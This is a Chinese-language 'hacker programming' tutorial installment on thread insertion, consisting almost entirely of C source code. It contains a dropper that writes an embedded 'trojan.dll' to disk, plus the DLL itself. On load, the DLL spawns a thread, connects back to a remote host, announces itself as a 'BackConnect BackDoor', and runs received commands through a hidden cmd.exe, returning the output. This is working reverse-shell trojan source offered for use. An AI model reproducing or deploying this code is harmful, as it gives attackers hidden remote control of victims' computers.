黑客编程教程(十六)线程插入技术
第十六节 线程插入技术头文件:// resource.h#define RC_BINARYTYPE 256#define ID_MAGICDEL_DLL 100DLL文件:#include <windows.h>#include<stdio.h>#include "resource.h"void WriteResourceToFile(char const *filename){HINSTANCE hInstance=GetModuleHandle(NULL); HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL), MAKEINTRESOURCE(RC_BINARYTYPE)); HGLOBAL hgRes = LoadResource(hInstance, hResInfo); void *pvRes = LockResource(hgRes); DWORD cbRes = SizeofResource(hInstance, hResInfo); HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); DWORD cbWritten; WriteFile(hFile, pvRes, cbRes, &cbWritten, 0); CloseHandle(hFile);}int main(void){ WriteResourceToFile("trojan.dll");return 0;}主程序:#include<winsock2.h>#include<stdio.h>#pragma comment(lib,"ws2_32.lib")#pragma comment(lib, "kernel32.lib")int StartSocket();//连接函数BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) //动态连接库的入口,相当于main()函数{switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DWORD id; CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id); break; } default: break; } return TRUE;}int StartSocket(){char *messages = "\r\n======================== BackConnect BackDoor V0.1 ========================\r\n========= Welcome to Http://www.hackerxfiles.net =========\r\n"; WSADATA WSAData;SOCKET sock;SOCKADDR_IN addr_in;char buf1[1024]; //作为socket接收数据的缓冲区memset(buf1,0,1024); //清空缓冲区 if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(80); //反向连接的远端主机端口 addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1"); //远端IP if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:d\n",WSAGetLastError()); return; } if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //连接客户主机 { printf("Connect failed.Error:d",WSAGetLastError()); return; } if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR) //发送欢迎信息 { printf("Send failed.Error:d\n",WSAGetLastError()); return; } char buffer[2048] = {0};//管道输出的数据for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出HANDLE hRead,hWrite;sa.nLength = sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor = NULL;sa.bInheritHandle = TRUE;if (!CreatePipe(&hRead,&hWrite,&sa,0)) { printf("Error On CreatePipe()"); return;} STARTUPINFO si;PROCESS_INFORMATION pi; si.cb = sizeof(STARTUPINFO);GetStartupInfo(&si); si.hStdError = hWrite;si.hStdOutput = hWrite;si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;GetSystemDirectory(cmdline,MAX_PATH+1);strcat(cmdline,"\\cmd.exe /c");int len=recv(sock,buf1,1024,NULL);if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序if(len<=1){send(sock,"error\n",sizeof("error\n"),0);continue;}strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdlineif (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { send(sock,"Error command\n",sizeof("Error command\n"),0); continue;} CloseHandle(hWrite);//循环读取管道中数据并发送,直到管道中没有数据为止for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){ send(sock,buffer,strlen(buffer),0);} }return 0;}